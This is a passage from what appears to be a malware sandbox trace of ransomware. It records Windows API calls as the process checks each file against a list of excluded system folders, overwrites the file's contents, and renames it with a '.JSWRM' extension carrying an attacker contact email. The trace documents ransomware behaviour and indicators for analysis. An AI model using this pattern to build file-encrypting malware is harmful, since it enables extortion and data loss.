CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\ACCTBOX.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\acctbox.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0140.229] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=7354) returned 1 [0140.229] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.230] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x1cb0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x1cb0, lpOverlapped=0x0) returned 1 [0140.235] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.235] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x1cb0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x1cb0, lpOverlapped=0x0) returned 1 [0140.236] CloseHandle (hObject=0x238) returned 1 [0140.237] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\ACCTBOX.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\acctbox.poc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\ACCTBOX.POC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\acctbox.poc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0140.239] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x218177f4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x218177f4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x218177f4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5f09, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="AD.DPV", cAlternateFileName="")) returned 1 [0140.239] lstrcmpiW (lpString1="AD.DPV", lpString2=".") returned 1 [0140.239] lstrcmpiW (lpString1="AD.DPV", lpString2="..") returned 1 [0140.239] lstrcmpiW (lpString1="AD.DPV", lpString2="...") returned 1 [0140.239] lstrcmpiW (lpString1="AD.DPV", lpString2="windows") returned -1 [0140.239] lstrcmpiW (lpString1="AD.DPV", lpString2="recovery") returned -1 [0140.239] lstrcmpiW (lpString1="AD.DPV", lpString2="perflogs") returned -1 [0140.239] lstrcmpiW (lpString1="AD.DPV", lpString2="documents and settings") returned -1 [0140.239] lstrcmpiW (lpString1="AD.DPV", lpString2="$RECYCLE.BIN") returned 1 [0140.239] lstrcmpiW (lpString1="AD.DPV", lpString2="system volume information") returned -1 [0140.239] lstrcmpiW (lpString1="AD.DPV", lpString2="msocache") returned -1 [0140.239] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AD.DPV", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0140.239] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AD.DPV", cchWideChar=6, lpMultiByteStr=0x345ebd8, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AD.DPV", lpUsedDefaultChar=0x0) returned 6 [0140.239] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AD.DPV", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0140.239] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AD.DPV", cchWideChar=6, lpMultiByteStr=0x345eba8, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AD.DPV", lpUsedDefaultChar=0x0) returned 6 [0140.239] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0140.239] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0140.239] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\AD.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\ad.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0140.240] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=24329) returned 1 [0140.240] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.240] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x5f00, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x5f00, lpOverlapped=0x0) returned 1 [0140.243] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.243] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x5f00, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x5f00, lpOverlapped=0x0) returned 1 [0140.243] CloseHandle (hObject=0x238) returned 1 [0140.244] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\AD.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\ad.dpv"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\AD.DPV.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\ad.dpv.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0140.245] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x2183da4c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x2183da4c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2183da4c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x40a, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="AD.XML", cAlternateFileName="")) returned 1 [0140.245] lstrcmpiW (lpString1="AD.XML", lpString2=".") returned 1 [0140.245] lstrcmpiW (lpString1="AD.XML", lpString2="..") returned 1 [0140.245] lstrcmpiW (lpString1="AD.XML", lpString2="...") returned 1 [0140.245] lstrcmpiW (lpString1="AD.XML", lpString2="windows") returned -1 [0140.245] lstrcmpiW (lpString1="AD.XML", lpString2="recovery") returned -1 [0140.245] lstrcmpiW (lpString1="AD.XML", lpString2="perflogs") returned -1 [0140.245] lstrcmpiW (lpString1="AD.XML", lpString2="documents and settings") returned -1 [0140.245] lstrcmpiW (lpString1="AD.XML", lpString2="$RECYCLE.BIN") returned 1 [0140.245] lstrcmpiW (lpString1="AD.XML", lpString2="system volume information") returned -1 [0140.245] lstrcmpiW (lpString1="AD.XML", lpString2="msocache") returned -1 [0140.245] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AD.XML", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0140.245] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AD.XML", cchWideChar=6, lpMultiByteStr=0x345ebd8, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AD.XML", lpUsedDefaultChar=0x0) returned 6 [0140.245] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AD.XML", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0140.245] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AD.XML", cchWideChar=6, lpMultiByteStr=0x345eba8, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AD.XML", lpUsedDefaultChar=0x0) returned 6 [0140.245] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0140.245] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0140.245] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\AD.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\ad.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0140.246] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1034) returned 1 [0140.246] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.246] ReadFile (in: hFile=0x238, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e89c*=0x400, lpOverlapped=0x0) returned 1 [0140.248] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.248] WriteFile (in: hFile=0x238, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e898*=0x400, lpOverlapped=0x0) returned 1 [0140.248] CloseHandle (hObject=0x238) returned 1 [0140.248] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\AD.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\ad.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\AD.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\ad.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0140.249] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x217f15bb, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x217f15bb, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x218177f4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xb95a, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="AD98.POC", cAlternateFileName="")) returned 1 [0140.249] lstrcmpiW (lpString1="AD98.POC", lpString2=".") returned 1 [0140.249] lstrcmpiW (lpString1="AD98.POC", lpString2="..") returned 1 [0140.249] lstrcmpiW (lpString1="AD98.POC", lpString2="...") returned 1 [0140.249] lstrcmpiW (lpString1="AD98.POC", lpString2="windows") returned -1 [0140.249] lstrcmpiW (lpString1="AD98.POC", lpString2="recovery") returned -1 [0140.249] lstrcmpiW (lpString1="AD98.POC", lpString2="perflogs") returned -1 [0140.249] lstrcmpiW (lpString1="AD98.POC", lpString2="documents and settings") returned -1 [0140.249] lstrcmpiW (lpString1="AD98.POC", lpString2="$RECYCLE.BIN") returned 1 [0140.249] lstrcmpiW (lpString1="AD98.POC", lpString2="system volume information") returned -1 [0140.249] lstrcmpiW (lpString1="AD98.POC", lpString2="msocache") returned -1 [0140.250] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AD98.POC", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0140.250] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AD98.POC", cchWideChar=8, lpMultiByteStr=0x345ebd8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AD98.POC", lpUsedDefaultChar=0x0) returned 8 [0140.250] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AD98.POC", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0140.250] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AD98.POC", cchWideChar=8, lpMultiByteStr=0x345eba8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AD98.POC", lpUsedDefaultChar=0x0) returned 8 [0140.250] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0140.250] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0140.250] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\AD98.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\ad98.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0140.259] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=47450) returned 1 [0140.259] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.260] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0xb950, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0xb950, lpOverlapped=0x0) returned 1 [0140.284] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.284] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xb950, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0xb950, lpOverlapped=0x0) returned 1 [0140.285] CloseHandle (hObject=0x238) returned 1 [0140.285] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\AD98.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\ad98.poc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\AD98.POC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\ad98.poc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0140.287] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x217f15bb, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x217f15bb, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x218177f4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x854, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="ADRESPEL.POC", cAlternateFileName="")) returned 1 [0140.287] lstrcmpiW (lpString1="ADRESPEL.POC", lpString2=".") returned 1 [0140.287] lstrcmpiW (lpString1="ADRESPEL.POC", lpString2="..") returned 1 [0140.287] lstrcmpiW (lpString1="ADRESPEL.POC", lpString2="...") returned 1 [0140.287] lstrcmpiW (lpString1="ADRESPEL.POC", lpString2="windows") returned -1 [0140.287] lstrcmpiW (lpString1="ADRESPEL.POC", lpString2="recovery") returned -1 [0140.287] lstrcmpiW (lpString1="ADRESPEL.POC", lpString2="perflogs") returned -1 [0140.287] lstrcmpiW (lpString1="ADRESPEL.POC", lpString2="documents and settings") returned -1 [0140.287] lstrcmpiW (lpString1="ADRESPEL.POC", lpString2="$RECYCLE.BIN") returned 1 [0140.287] lstrcmpiW (lpString1="ADRESPEL.POC", lpString2="system volume information") returned -1 [0140.287] lstrcmpiW (lpString1="ADRESPEL.POC", lpString2="msocache") returned -1 [0140.287] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ADRESPEL.POC", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0140.287] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ADRESPEL.POC", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ADRESPEL.POC", lpUsedDefaultChar=0x0) returned 12 [0140.287] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ADRESPEL.POC", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0140.287] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ADRESPEL.POC", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ADRESPEL.POC", lpUsedDefaultChar=0x0) returned 12 [0140.287] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0140.287] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0140.288] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\ADRESPEL.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\adrespel.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0140.288] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2132) returned 1 [0140.288] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.289] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x850, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x850, lpOverlapped=0x0) returned 1 [0140.290] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.290] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x850, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x850, lpOverlapped=0x0) returned 1 [0140.290] CloseHandle (hObject=0x238) returned 1 [0140.293] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\ADRESPEL.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\adrespel.poc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\ADRESPEL.POC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\adrespel.poc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0140.294] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x218177f4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x218177f4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x218177f4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x594c, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="AIR98.POC", cAlternateFileName="")) returned 1 [0140.294] lstrcmpiW (lpString1="AIR98.POC", lpString2=".") returned 1 [0140.294] lstrcmpiW (lpString1="AIR98.POC", lpString2="..") returned 1 [0140.295] lstrcmpiW (lpString1="AIR98.POC", lpString2="...") returned 1 [0140.295] lstrcmpiW (lpString1="AIR98.POC", lpString2="windows") returned -1 [0140.295] lstrcmpiW (lpString1="AIR98.POC", lpString2="recovery") returned -1 [0140.295] lstrcmpiW (lpString1="AIR98.POC", lpString2="perflogs") returned -1 [0140.295] lstrcmpiW (lpString1="AIR98.POC", lpString2="documents and settings") returned -1 [0140.295] lstrcmpiW (lpString1="AIR98.POC", lpString2="$RECYCLE.BIN") returned 1 [0140.295] lstrcmpiW (lpString1="AIR98.POC", lpString2="system volume information") returned -1 [0140.295] lstrcmpiW (lpString1="AIR98.POC", lpString2="msocache") returned -1 [0140.295] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AIR98.POC", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0140.295] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AIR98.POC", cchWideChar=9, lpMultiByteStr=0x345ebd8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AIR98.POC", lpUsedDefaultChar=0x0) returned 9 [0140.295] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AIR98.POC", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0140.295] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AIR98.POC", cchWideChar=9, lpMultiByteStr=0x345eba8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AIR98.POC", lpUsedDefaultChar=0x0) returned 9 [0140.295] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0140.295] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0140.295] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\AIR98.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\air98.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0140.296] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=22860) returned 1 [0140.296] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.296] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x5940, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x5940, lpOverlapped=0x0) returned 1 [0140.302] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.302] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x5940, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x5940, lpOverlapped=0x0) returned 1 [0140.302] CloseHandle (hObject=0x238) returned 1 [0140.302] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\AIR98.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\air98.poc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\AIR98.POC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\air98.poc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0140.303] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x218177f4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x218177f4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x218177f4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xa402, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="AWARDHM.POC", cAlternateFileName="")) returned 1 [0140.303] 